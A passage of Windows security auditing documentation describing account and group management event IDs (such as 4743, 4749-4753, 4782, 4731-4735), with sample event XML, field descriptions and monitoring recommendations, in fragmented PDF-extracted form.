malicious action.
'Use DES Key Only' – Enabled Should not be enabled for computer accounts. For computer
accounts, it cannot be set in the account properties in Active
'Don't Require Preauth' - Enabled Should not be enabled for computer accounts. For computer
accounts, it cannot be set in the account properties in Active
4743(S): A computer account was deleted.
Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Computer
Account Management
Event Description:
This event generates every time a
computer object is deleted.
controllers.

Security Monitoring
Event XML:
- <System>
<Level>0</Level>
<Task>13825</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="TargetUserName">COMPUTERACCOUNT$</Data>
<Data Name="SubjectLogonId">0x3007b</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested the “delete Computer object” operation. Event Viewer
Account Name [Type = UnicodeString]: the name of the account that requested the “delete Computer
Target Computer:
Security ID [Type = SID ]: SID of deleted computer account. Event Viewer automatically tries to resolve
Account Name [Type = UnicodeString]: the name of the computer account that was deleted. For example:
WIN81$
Account Domain [Type = UnicodeString]: domain name of deleted computer account. Formats vary, and

For 4743(S ): A computer account was deleted.
If you have critical domain computer accounts (database servers, domain controllers, administration
workstations, and so on) for which you need to monitor each action (especially deletion), monitor this event with
the “Target Computer\Security ID” or “Target Computer\Account Name” that corresponds to the high-
value account or accounts.
Applies to
Windows 10
Windows Server 2016
Audit Distribution Group Management determines whether the operating system generates audit events for
specific distribution-group management tasks.
This subcategory generates events only on domain controllers.
Event volume: Low on domain controllers.
This subcategory allows you to audit events generated by changes to distribution groups such as the following:
Distribution group is created, changed, or deleted.
Member is added or removed from a distribution group.
If you need to monitor for group type changes, you need to monitor for “4764: A group’s type was changed.”
“Audit Security Group Management” subcategory success auditing must be enabled.
STRONGER STRONGER
STRONGER STRONGER
Domain IF No IF No IF - Typically
Controller actions related to
distribution
groups have low
security
relevance, much
more important
to monitor
Security Group
changes. But if
you want to
monitor for
critical
distribution
groups changes,
such as member
was added to
internal critical
distribution
group
(executives,
administrative
group, for
example), you
need to enable
this subcategory
for Success
auditing.
Typically volume
of these events is
low on domain
controllers.
This subcategory
doesn’t have
Failure events, so
there is no
recommendation
to enable Failure
auditing for this
subcategory.

generates events
only on domain
controllers.

generates events
only on domain
controllers.
Events List:
4749(S ): A security-disabled global group was created.
4750(S ): A security-disabled global group was changed.
4751(S ): A member was added to a security-disabled global group.
4752(S ): A member was removed from a security-disabled global group.
4753(S ): A security-disabled global group was deleted.
4759(S ): A security-disabled universal group was created. See event “4749: A security-disabled global group
was created.” Event 4759 is the same, but it is generated for a universal distribution group instead of a global
distribution group. All event fields, XML, and recommendations are the same. The type of group is the only
difference.
4760(S ): A security-disabled universal group was changed. See event “4750: A security-disabled global
group was changed.” Event 4760 is the same, but it is generated for a universal distribution group instead of a
global distribution group. All event fields, XML, and recommendations are the same. The type of group is the only
difference.
4761(S ): A member was added to a security-disabled universal group. See event “4751: A member was
added to a security-disabled global group.” Event 4761 is the same, but it is generated for a universal distribution
group instead of a global distribution group. All event fields, XML, and recommendations are the same. The type
of group is the only difference.
4762(S ): A member was removed from a security-disabled universal group. See event “4752: A member
was removed from a security-disabled global group.” Event 4762 is the same, but it is generated for a universal
distribution group instead of a global distribution group. All event fields, XML, and recommendations are the
same. The type of group is the only difference.
4763(S ): A security-disabled universal group was deleted. See event “4753: A security-disabled global group
was deleted.” Event 4763 is the same, but it is generated for a universal distribution group instead of a global
difference.
4744(S ): A security-disabled local group was created. See event “4749: A security-disabled global group was
created.” Event 4744 is the same, but it is generated for a local distribution group instead of a global distribution
group. All event fields, XML, and recommendations are the same. The type of group is the only difference.
4745(S ): A security-disabled local group was changed. See event “4750: A security-disabled global group
was changed.” Event 4745 is the same, but it is generated for a local distribution group instead of a global
difference.
4746(S ): A member was added to a security-disabled local group. See event “4751: A member was added to
a security-disabled global group.” Event 4746 is the same, but it is generated for a local distribution group instead
of a global distribution group. All event fields, XML, and recommendations are the same. The type of group is the
only difference.
4747(S ): A member was removed from a security-disabled local group. See event “4752: A member was
removed from a security-disabled global group.” Event 4747 is the same, but it is generated for a local
distribution group instead of a global distribution group. All event fields, XML, and recommendations are the
same. The type of group is the only difference.
4748(S ): A security-disabled local group was deleted. See event “4753: A security-disabled global group was
deleted.” Event 4748 is the same, but it is generated for a local distribution group instead of a global distribution
4749(S): A security-disabled global group was
created.
Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Distribution Group
Management
Event Description:
security-disabled (distribution) global group
was created.
controllers.

Event XML:
- <System>
<Level>0</Level>
<Task>13827</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="TargetUserName">ServiceDesk</Data>
<Data Name="SamAccountName">ServiceDesk</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested the “create group” operation. Event Viewer
Account Name [Type = UnicodeString]: the name of the account that requested the “create group”
operation.
following:
Group:
Security ID [Type = SID ]: SID of created group. Event Viewer automatically tries to resolve SIDs and show
the group name. If the SID cannot be resolved, you will see the source data in the event.
Group Name [Type = UnicodeString]: the name of the group that was created. For example: ServiceDesk
Group Domain [Type = UnicodeString]: domain name of created group. Formats vary, and include the
following:
Attributes:
SAM Account Name [Type = UnicodeString]: This is a name of new group used to support clients and
servers from previous versions of Windows (pre-Windows 2000 logon name). The value of
sAMAccountName attribute of new group object. For example: ServiceDesk
value of sIDHistory attribute of new group object. This parameter might not be captured in the event, and
in that case appears as “-”.

For 4749(S ): A security-disabled global group was created.
If you need to monitor each time a new distribution group is created, to see who created the group and
when, monitor this event. Typically, this event is used as an informational event, to be reviewed if needed.
If your organization has naming conventions for account names, monitor “Attributes\SAM Account
Name” for names that don’t comply with the naming conventions.
changed.
Applies to
Windows 10
Windows Server 2016
Management
Event Description:
This event generates every time security-
disabled (distribution) global group is
changed.
controllers.
Some changes do not invoke a 4750 event, for
example, changes made using the Active
Directory Users and Computers management
console in Managed By tab in group account
properties.
If you change the name of the group (SAM
Account Name), you also get “4781: The name
of an account was changed” if “Audit User
Account Management” subcategory success
auditing is enabled.
If you change the group type, you get a change event from the new group type auditing subcategory instead of
4750. If you need to monitor for group type changes, it is better to monitor for “4764: A group’s type was
changed.” These events are generated for any group type when group type is changed. “Audit Security Group
Management” subcategory success auditing must be enabled.
From 4750 event you can get information about changes of sAMAccountName and sIDHistory attributes or
you will see that something changed, but will not be able to see what exactly changed.
Event XML:
- <System>
<Level>0</Level>
<Task>13827</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="TargetUserName">ServiceDeskMain</Data>
<Data Name="SamAccountName">ServiceDeskMain</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested the “change group” operation. Event Viewer
Account Name [Type = UnicodeString]: the name of the account that requested the “change group”
operation.
following:
Group:
Security ID [Type = SID ]: SID of changed group. Event Viewer automatically tries to resolve SIDs and show
Note Sometimes you can see the Group\Security ID field contains an old group name in Event Viewer (as
you can see in the event example). That happens because Event Viewer caches names for SIDs that it has
already resolved for the current session.
Note Security ID field has the same value as new group name (Changed Attributes>SAM Account
Name). That is happens because event is generated after name was changed and SID resolves to the new
name. It is always better to use SID instead of group names for queries or filtering of events, because you will
know for sure that this the right object you are looking for or want to monitor.
Group Name [Type = UnicodeString]: the name of the group that was changed. For example: ServiceDesk
Group Domain [Type = UnicodeString]: domain name of changed group. Formats vary, and include the
following:
Built-in groups: Builtin
Changed Attributes:

Note You might see a 4750 event without any changes inside, that is, where all Changed Attributes appear
as “-“. This usually happens when a change is made to an attribute that is not listed in the event. In this case
there is no way to determine which attribute was changed. For example, this would happen if you change the
Description of a group object using the Active Directory Users and Computers administrative console. Also, if
the discretionary access control list (DACL ) is changed, a 4750 event will generate, but all attributes will be “-“.
SAM Account Name [Type = UnicodeString]: This is a new name of changed group used to support
clients and servers from previous versions of Windows (pre-Windows 2000 logon name). If the value of
sAMAccountName attribute of group object was changed, you will see the new value here. For example:
ServiceDesk.
attribute of group object was changed, you will see the new value here.

For 4750(S ): A security-disabled global group was changed.
If you have a list of critical distribution groups in the organization, and need to specifically monitor these
groups for any change, monitor events with the “Group\Group Name” values that correspond to the
critical distribution groups.
If you need to monitor each time a member is added to a distribution group, to see who added the member
and when, monitor this event. Typically, this event is used as an informational event, to be reviewed if
needed.
4751(S): A member was added to a security-disabled
global group.
Applies to
Windows 10
Windows Server 2016
Management
Event Description:
member was added to a security-disabled
(distribution) global group.
controllers.
For every added member you will get separate
4751 event.
You will typically see “4750: A security-
disabled global group was changed.” event
without any changes in it prior to 4751 event.

Event XML:
- <System>
<Level>0</Level>
<Task>13827</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="MemberName">CN=Auditor,CN=Users,DC=contoso,DC=local</Data>
<Data Name="MemberSid">S-1-5-21-3457937927-2839227994-823803824-2104</Data>
<Data Name="TargetUserName">ServiceDeskSecond</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested the “add member to the group” operation. Event
Account Name [Type = UnicodeString]: the name of the account that requested the “add member to the
group” operation.
following:
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events that
might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Member:
Security ID [Type = SID ]: SID of account that was added to the group. Event Viewer automatically tries to
resolve SIDs and show the group name. If the SID cannot be resolved, you will see the source data in the
event.
Account Name [Type = UnicodeString]: distinguished name of account that was added to the group. For
example: “CN=Auditor,CN=Users,DC=contoso,DC=local”. For some well-known security principals, such
as LOCAL SERVICE or ANONYMOUS LOGON, the value of this field is “-”.
Note The LDAP API references an LDAP object by its distinguished name (DN ). A DN is a sequence of
relative distinguished names (RDN ) connected by commas.
An RDN is an attribute with an associated value in the form attribute=value; . These are examples of RDNs
attributes:
• DC - domainComponent
• CN - commonName
• OU - organizationalUnitName
• O - organizationName
Group:
Security ID [Type = SID ]: SID of the group to which new member was added. Event Viewer automatically
tries to resolve SIDs and show the group name. If the SID cannot be resolved, you will see the source data
in the event.
Group Name [Type = UnicodeString]: the name of the group to which new member was added. For
example: ServiceDesk
Group Domain [Type = UnicodeString]: domain name of the group to which new member was added.
Formats vary, and include the following:
For 4751(S ): A member was added to a security-disabled global group.
Addition of members to distribution groups: You might If you need to monitor each time a member is added to a
need to monitor the addition of members to distribution distribution group, to see who added the member and when,
groups. monitor this event.
Typically, this event is used as an informational event, to be
reviewed if needed.
High-value distribution groups: You might have a list of Monitor this event with the “Group\Group Name” values
critical distribution groups in the organization, and need to that correspond to the high-value distribution groups.
specifically monitor these groups for the addition of new
members (or for other changes).
High-value accounts: You might have high-value domain or Monitor this event with the “Subject\Security ID” and
local accounts for which you need to monitor each action. “Member\Security ID” that correspond to the high-value
Examples of high-value accounts are database administrators, account or accounts.
requirements for detecting anomalies or monitoring potential “Subject\Security ID” (with other information) to monitor
use of an account outside of working hours.
Non-active accounts: You might have non-active, disabled, Monitor this event with the “Subject\Security ID” and
or guest accounts, or other accounts that should never be “Member\Security ID” that correspond to the accounts that
used. should never be used.
accounts that are the only ones allowed to perform actions the “Subject\Security ID” for accounts that are outside the
Accounts of different types: You might want to ensure that If this event corresponds to an action you want to monitor for
certain actions are performed only by certain account types, certain account types, review the “Subject\Security ID” to
for example, local or domain account, machine or user see whether the account type is as expected.
account, vendor or employee account, and so on.
External accounts: You might be monitoring accounts from Monitor this event for the “Subject\Account Domain”
another domain, or “external” accounts that are not allowed to corresponding to accounts from another domain or “external”
perform certain actions (represented by certain specific accounts.
events).
certain computers, machines, or devices on which certain actions performed by the “Subject\Security ID” that you are
people (accounts) should not typically perform any actions. concerned about.
Account naming conventions: Your organization might have Monitor “Subject\Account Name” for names that don’t
specific naming conventions for account names. comply with naming conventions.
4752(S): A member was removed from a security-
disabled global group.
Applies to
Windows 10
Windows Server 2016
Management
Event Description:
This event generates every time member was
removed from the security-disabled
(distribution) global group.
controllers.
For every removed member you will get
separate 4752 event.

Event XML:
- <System>
<Level>0</Level>
<Task>13827</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested the “remove member from the group” operation.
Account Name [Type = UnicodeString]: the name of the account that requested the “remove member
from the group” operation.
following:
Member:
Security ID [Type = SID ]: SID of account that was removed from the group. Event Viewer automatically
in the event.
Account Name [Type = UnicodeString]: distinguished name of account that was removed from the group.
For example: “CN=Auditor,CN=Users,DC=contoso,DC=local”. For some well-known security principals,
such as LOCAL SERVICE or ANONYMOUS LOGON, the value of this field is “-”.
attributes:
• CN - commonName
Group:
Security ID [Type = SID ]: SID of the group from which the member was removed. Event Viewer
automatically tries to resolve SIDs and show the group name. If the SID cannot be resolved, you will see the
Group Name [Type = UnicodeString]: the name of the group from which the member was removed. For
Group Domain [Type = UnicodeString]: domain name of the group from which the member was removed.

For 4752(S ): A member was removed from a security-disabled global group.
Removal of members from distribution groups: You If you need to monitor each time a member is removed from
might need to monitor the removal of members from a distribution group, to see who removed the member and
distribution groups. when, monitor this event.
reviewed if needed.
High-value distribution groups: You might have a list of Monitor this event with the “Group\Group Name” values
critical distribution groups in the organization, and need to that correspond to the high-value distribution groups.
specifically monitor these groups for the removal of members
(or for other changes).
Distribution groups with required members: You might Monitor this event with the “Group\Group Name” that
need to ensure that for certain distribution groups, particular corresponds to the group of interest, and the
members are never removed. “Member\Security ID” of the members who should not be
removed.
events).
deleted.
Applies to
Windows 10
Windows Server 2016
Management
Event Description:
disabled (distribution) global group is deleted.
controllers.

Event XML:
- <System>
<Level>0</Level>
<Task>13827</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested the “delete group” operation. Event Viewer
Account Name [Type = UnicodeString]: the name of the account that requested the “delete group”
operation.
following:
Group:
Security ID [Type = SID ]: SID of deleted group. Event Viewer automatically tries to resolve SIDs and show
Group Name [Type = UnicodeString]: the name of the group that was deleted. For example: ServiceDesk
Group Domain [Type = UnicodeString]: domain name of deleted group. Formats vary, and include the
following:

For 4753(S ): A security-disabled global group was deleted.
If you have a list of critical distribution groups in the organization, and need to specifically monitor these
groups for any change, especially group deletion, monitor events with the “Group\Group Name” values
that correspond to the critical distribution groups.
If you need to monitor each time a distribution group is deleted, to see who deleted it and when, monitor
this event. Typically, this event is used as an informational event, to be reviewed if needed.
Applies to
Windows 10
Windows Server 2016
Audit Other Account Management Events determines whether the operating system generates user account
management audit events.
Event volume: Typically Low on all types of computers.
This subcategory allows you to audit next events:
The password hash of a user account was accessed. This happens during an Active Directory Management
Tool password migration.
The Password Policy Checking API was called. Password Policy Checking API allows an application to check
password compliance against an application-provided account database or single account and verify that
passwords meet the complexity, aging, minimum length, and history reuse requirements of a password
policy.
STRONGER STRONGER
Domain Yes No Yes No The only reason

Controller to enable Success
auditing on
domain
controllers is to
monitor “4782(S):
The password
hash of an
account was
accessed.”
This subcategory
doesn’t have
Failure events, so
there is no
recommendation
to enable Failure
auditing for this
subcategory.
STRONGER STRONGER
Member Server No No No No The only event

which is
generated on
Member Servers
is “4793(S): The
Password Policy
Checking API was
called.”, this event
is a typical
information event
with little to no
security
relevance.
This subcategory
doesn’t have
Failure events, so
there is no
recommendation
to enable Failure
auditing for this
subcategory.
Workstation No No No No The only event

which is
generated on
Workstations is
“4793(S): The
Password Policy
Checking API was
called.”, this event
is a typical
information event
with little to no
security
relevance.
This subcategory
doesn’t have
Failure events, so
there is no
recommendation
to enable Failure
auditing for this
subcategory.
Events List:
4782(S ): The password hash of an account was accessed.
4793(S ): The Password Policy Checking API was called.
4782(S): The password hash of an account was
accessed.
Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Other Account
Management Events
Event Description:
This event generates on domain controllers
during password migration of an account
using Active Directory Migration Toolkit.
Typically “Subject\Security ID” is the
SYSTEM account.

Event XML:
- <System>
<Level>0</Level>
<Task>13829</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="TargetUserName">Andrei</Data>
<Data Name="SubjectUserSid">S-1-5-18</Data>
<Data Name="SubjectUserName">DC01$</Data>
<Data Name="SubjectLogonId">0x3e7</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested hash migration operation. Event Viewer automatically
tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in
the event.
Account Name [Type = UnicodeString]: the name of the account that requested hash migration operation.
For ANONYMOUS LOGON you will see NT AUTHORITY value for this field.
Target Account:
Account Name [Type = UnicodeString]: the name of the account for which the password hash was
migrated. For example: ServiceDesk
User account example: Andrei
Computer account example: DC01$
Account Domain [Type = UnicodeString]: domain name of the account for which the password hash was
migrated. Formats vary, and include the following:
Domain NETBIOS name example: FABRIKAM
Lowercase full domain name: fabrikam.local
Uppercase full domain name: FABRIKAM.LOCAL

For 4782(S ): The password hash of an account was accessed.
Monitor for all events of this type, because any actions with account’s password hashes should be planned. If
this action was not planned, investigate the reason for the change.
4793(S): The Password Policy Checking API was
called.
Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Other Account
Management Events
Event Description:
This event generates each time the Password
Policy Checking API is called.
The Password Policy Checking API allows an
application to check password compliance
against an application-provided account
database or single account and verify that
passwords meet the complexity, aging,
minimum length, and history reuse
requirements of a password policy.
This event, for example, generates during
Directory Services Restore Mode (DSRM )
account password reset procedure to check
new DSRM password.
This event generates on the computer where Password Policy Checking API was called.
Note that starting with Microsoft SQL Server 2005, the “SQL Server password policy” feature can generate many
4793 events on a SQL Server.
Event XML:
- <System>
<Level>0</Level>
<Task>13829</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="SubjectLogonId">0x36f67</Data>
<Data Name="Workstation">DC01</Data>
<Data Name="TargetUserName">-</Data>
</EventData>
</Event>
Required Server Roles: None.

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested Password Policy Checking API operation. Event
Account Name [Type = UnicodeString]: the name of the account that requested Password Policy Checking
API operation.
following:
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Caller Workstation [Type = UnicodeString]: name of the computer from which the Password Policy
Checking API was called. Typically, this is the same computer where this event was generated, for example,
DC01. Computer name here does not contain $ symbol at the end. It also can be an IP address or the DNS
name of the computer.
Provided Account Name (unauthenticated) [Type = UnicodeString]: the name of account, which
password was provided/requested for validation. This parameter might not be captured in the event, and in
that case appears as “-”.
Status Code [Type = HexInt32]: typically has “0x0” value. Status code is “0x0”, no matter meets password
domain Password Policy or not.

For 4793(S ): The Password Policy Checking API was called.
Typically this is an informational event, and can give you information about when Password Policy Checking
APIs were invoked, and who invoked them. The Provided Account Name does not always have a value—
sometimes it’s not really possible to determine for which account the password policy check was performed.
Applies to
Windows 10
Windows Server 2016
Audit Security Group Management determines whether the operating system generates audit events when
specific security group management tasks are performed.
Event volume: Low.
This subcategory allows you to audit events generated by changes to security groups such as the following:
Security group is created, changed, or deleted.
Member is added or removed from a security group.
Group type is changed.
STRONGER STRONGER
Domain Yes No Yes No We recommend

Controller Success auditing
of security
groups, to see
new group
creation events,
changes and
deletion of critical
groups. Also you
will get
information
about new
members of
security groups,
when a member
was removed
from a group and
when security
group
membership was
enumerated.
This subcategory
doesn’t have
Failure events, so
there is no
recommendation
to enable Failure
auditing for this
subcategory.
STRONGER STRONGER
Member Server Yes No Yes No We recommend

Success auditing
of security
groups, to see
new group
creation events,
changes and
groups. Also you
will get
information
about new
members of
security groups,
when a member
was removed
from a group and
when security
group
membership was
enumerated.
This subcategory
doesn’t have
Failure events, so
there is no
recommendation
to enable Failure
auditing for this
subcategory.
Workstation Yes No Yes No We recommend

Success auditing
of security
groups, to see
new group
creation events,
changes and
groups. Also you
will get
information
about new
members of
security groups,
when a member
was removed
from a group and
when security
group
membership was
enumerated.
This subcategory
doesn’t have
Failure events, so
there is no
recommendation
to enable Failure
auditing for this
subcategory.
Events List:
4731(S ): A security-enabled local group was created.
4732(S ): A member was added to a security-enabled local group.
4733(S ): A member was removed from a security-enabled local group.
4734(S ): A security-enabled local group was deleted.
4735(S ): A security-enabled local group was changed.
4764(S ): A group’s type was changed.
4799(S ): A security-enabled local group membership was enumerated.
4727(S ): A security-enabled global group was created. See event “4731: A security-enabled local group was
created.” Event 4727 is the same, but it is generated for a global security group instead of a local security group.
All event fields, XML, and recommendations are the same. The type of group is the only difference.
Important: this event generates only for domain groups, so the Local sections in event 4731 do not apply.
4737(S ): A security-enabled global group was changed. See event “4735: A security-enabled local group
was changed.” Event 4737 is the same, but it is generated for a global security group instead of a local security
4728(S ): A member was added to a security-enabled global group. See event “4732: A member was added
to a security-enabled local group.” Event 4728 is the same, but it is generated for a global security group instead
of a local security group. All event fields, XML, and recommendations are the same. The type of group is the only
difference.
4729(S ): A member was removed from a security-enabled global group. See event “4733: A member was
removed from a security-enabled local group.” Event 4729 is the same, but it is generated for a global security
group instead of a local security group. All event fields, XML, and recommendations are the same. The type of
group is the only difference.
4730(S ): A security-enabled global group was deleted. See event “4734: A security-enabled local group was
deleted.” Event 4730 is the same, but it is generated for a global security group instead of a local security group.
All event fields, XML, and recommendations are the same. The type of group is the only difference.
4754(S ): A security-enabled universal group was created. See event “4731: A security-enabled local group
was created.”. Event 4754 is the same, but it is generated for a universal security group instead of a local security
4755(S ): A security-enabled universal group was changed. See event “4735: A security-enabled local group
was changed.”. Event 4737 is the same, but it is generated for a universal security group instead of a local
security group. All event fields, XML, and recommendations are the same. The type of group is the only
difference.
4756(S ): A member was added to a security-enabled universal group. See event “4732: A member was
added to a security-enabled local group.”. Event 4756 is the same, but it is generated for a universal security
group instead of a local security group. All event fields, XML, and recommendations are the same. The type of
group is the only difference.
4757(S ): A member was removed from a security-enabled universal group. See event “4733: A member
was removed from a security-enabled local group.”. Event 4757 is the same, but it is generated for a universal
security group instead of a local security group. All event fields, XML, and recommendations are the same. The
type of group is the only difference.
4758(S ): A security-enabled universal group was deleted. See event “4734: A security-enabled local group
was deleted.”. Event 4758 is the same, but it is generated for a universal security group instead of a local security
4731(S): A security-enabled local group was created.
Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Security Group
Management
Event Description:
security-enabled (security) local group was
created.
This event generates on domain controllers,
member servers, and workstations.

Monitoring Recommendations for this
event.
Event XML:
- <System>
<Level>0</Level>
<Task>13826</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="TargetUserName">AccountOperators</Data>
<Data Name="SubjectLogonId">0x3031e</Data>
<Data Name="SamAccountName">AccountOperators</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested the “create group” operation. Event Viewer
Account Name [Type = UnicodeString]: the name of the account that requested the “create group”
operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
New Group:
Security ID [Type = SID ]: SID of created group. Event Viewer automatically tries to resolve SIDs and
show the group name. If the SID cannot be resolved, you will see the source data in the event.
Group Name [Type = UnicodeString]: the name of the group that was created. For example: ServiceDesk
Group Domain [Type = UnicodeString]: domain or computer name of the created group. Formats vary,
and include the following:
For a local group, this field will contain the name of the computer to which this new group belongs,
for example: “Win81”.
Attributes:
SAM Account Name [Type = UnicodeString]: This is a name of new group used to support clients and
servers from previous versions of Windows (pre-Windows 2000 logon name). The value of
sAMAccountName attribute of new group object. For example: ServiceDesk. For local groups it is simply
a name of new group.
becomes the objectSID. The previous SID is added to the sIDHistory property. This parameter contains
the value of sIDHistory attribute of new group object. This parameter might not be captured in the event,
and in that case appears as “-”. For local groups it is not applicable and always has “-“ value.

For 4731(S ): A security-enabled local group was created.
If you need to monitor each time a new security group is created, to see who created the group and when,
monitor this event.
If you need to monitor the creation of local security groups on different servers, and you use Windows
Event Forwarding to collect events in a central location, check “New Group\Group Domain.” It should
not be the name of the domain, but instead should be the computer name.
4732(S): A member was added to a security-enabled
local group.
Applies to
Windows 10
Windows Server 2016
Management
Event Description:
member was added to a security-enabled
(security) local group.
This event generates on domain
controllers, member servers, and
workstations.
For every added member you will get
enabled local group was changed.” event
without any changes in it prior to 4732
event.

for this event.
Event XML:
- <System>
<Level>0</Level>
<Task>13826</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="MemberName">CN=eadmin,CN=Users,DC=contoso,DC=local</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested the “add member to the group” operation. Event
Account Name [Type = UnicodeString]: the name of the account that requested the “add member to the
group” operation.
the following:
Member:
Security ID [Type = SID ]: SID of account that was added to the group. Event Viewer automatically tries to
resolve SIDs and show the group name. If the SID cannot be resolved, you will see the source data in the
event.
Account Name [Type = UnicodeString]: distinguished name of account that was added to the group. For
example: “CN=Auditor,CN=Users,DC=contoso,DC=local”. For local groups this field typically has “-“ value,
even if new member is a domain account. For some well-known security principals, such as LOCAL
SERVICE or ANONYMOUS LOGON, the value of this field is “-”.
attributes:
• CN - commonName
Group:
Security ID [Type = SID ]: SID of the group to which new member was added. Event Viewer automatically
in the event.
Group Name [Type = UnicodeString]: the name of the group to which new member was added. For
Group Domain [Type = UnicodeString]: domain or computer name of the group to which the new
member was added. Formats vary, and include the following:

For 4732(S ): A member was added to a security-enabled local group.
Addition of members to local or domain security If you need to monitor each time a member is added to a
groups: You might need to monitor the addition of members local or domain security group, to see who added the
to local or domain security groups. member and when, monitor this event.
reviewed if needed.
High-value local or domain security groups: You might Monitor this event with the “Group\Group Name” values
have a list of critical local or domain security groups in the that correspond to the high-value local or domain security
organization, and need to specifically monitor these groups groups.
for the addition of new members (or for other changes).
Examples of critical local or domain groups are built-in local
administrators group, domain admins, enterprise admins, and
so on.
another domain, or “external” accounts that are not allowed corresponding to accounts from another domain or “external”
to perform certain actions (represented by certain specific accounts.
events).
Mismatch between type of account (user or computer) Monitor the type of account added to the group to see if it
and the group it was added to: You might want to monitor matches what the group is intended for.
to ensure that a computer account was not added to a group
intended for users, or a user account was not added to a
group intended for computers.
4733(S): A member was removed from a security-
enabled local group.
Applies to
Windows 10
Windows Server 2016
Management
Event Description:
This event generates every time member
was removed from security-enabled
(security) local group.
This event generates on domain
controllers, member servers, and
workstations.
For every removed member you will get
enabled local group was changed.” event
without any changes in it prior to 4733
event.

for this event.
Event XML:
- <System>
<Level>0</Level>
<Task>13826</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested the “remove member from the group” operation.
Account Name [Type = UnicodeString]: the name of the account that requested the “remove member
from the group” operation.
the following:
Member:
Security ID [Type = SID ]: SID of account that was removed from the group. Event Viewer automatically
in the event.
Account Name [Type = UnicodeString]: distinguished name of account that was removed from the group.
For example: “CN=Auditor,CN=Users,DC=contoso,DC=local”. For local groups this field typically has “-“
value, even if removed member is a domain account. For some well-known security principals, such as
LOCAL SERVICE or ANONYMOUS LOGON, the value of this field is “-”.
attributes:
• CN - commonName
Group:
Security ID [Type = SID ]: SID of the group from which the member was removed. Event Viewer
automatically tries to resolve SIDs and show the group name. If the SID cannot be resolved, you will see
Group Name [Type = UnicodeString]: the name of the group from which the member was removed. For
Group Domain [Type = UnicodeString]: domain or computer name of the group from which the member
was removed. Formats vary, and include the following:
For a local group, this field will contain the name of the computer to which this new group belongs, for
example: “Win81”.

For 4733(S ): A member was removed from a security-enabled local group.
Removal of members from local or domain security If you need to monitor each time a member is removed from
groups: You might need to monitor the removal of members a local or domain security group, to see who added the
from local or domain security groups. member and when, monitor this event.
reviewed if needed.
High-value local or domain security groups: You might Monitor this event with the “Group\Group Name” values
have a list of critical local or domain security groups in the that correspond to the high-value local or domain security
organization, and need to specifically monitor these groups groups.
for the removal of members (or for other changes).
Examples of critical local or domain groups are built-in local
administrators group, domain admins, enterprise admins, and
so on.
Local or domain security groups with required Monitor this event with the “Group\Group Name” that
members: You might need to ensure that for certain local or corresponds to the group of interest, and the
domain security groups, particular members are never “Member\Security ID” of the members who should not be
removed. removed.
events).
4734(S): A security-enabled local group was deleted.
Applies to
Windows 10
Windows Server 2016
Management
Event Description:
enabled (security) local group is deleted.

event.
Event XML:
- <System>
<Level>0</Level>
<Task>13826</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested the “delete group” operation. Event Viewer
Account Name [Type = UnicodeString]: the name of the account that requested the “delete group”
operation.
the following:
Group:
Security ID [Type = SID ]: SID of deleted group. Event Viewer automatically tries to resolve SIDs and
Group Name [Type = UnicodeString]: the name of the group that was deleted. For example: ServiceDesk
Group Domain [Type = UnicodeString]: domain or computer name of the deleted group. Formats vary,

For 4734(S ): A security-enabled local group was deleted.
If you have a list of critical local or domain security groups in the organization, and need to specifically
monitor these groups for any change, especially group deletion, monitor events with the “Group\Group
Name” values that correspond to the critical local or domain security groups. Examples of critical local or
domain groups are built-in local administrators group, domain admins, enterprise admins, and so on.
If you need to monitor each time a local or domain security group is deleted, to see who deleted it and
when, monitor this event. Typically, this event is used as an informational event, to be reviewed if needed.
4735(S): A security-enabled local group was
changed.
Applies to
Windows 10
Windows Server 2016
Management
Event Description:
This event generates every time a security-
enabled (security) local group is changed.
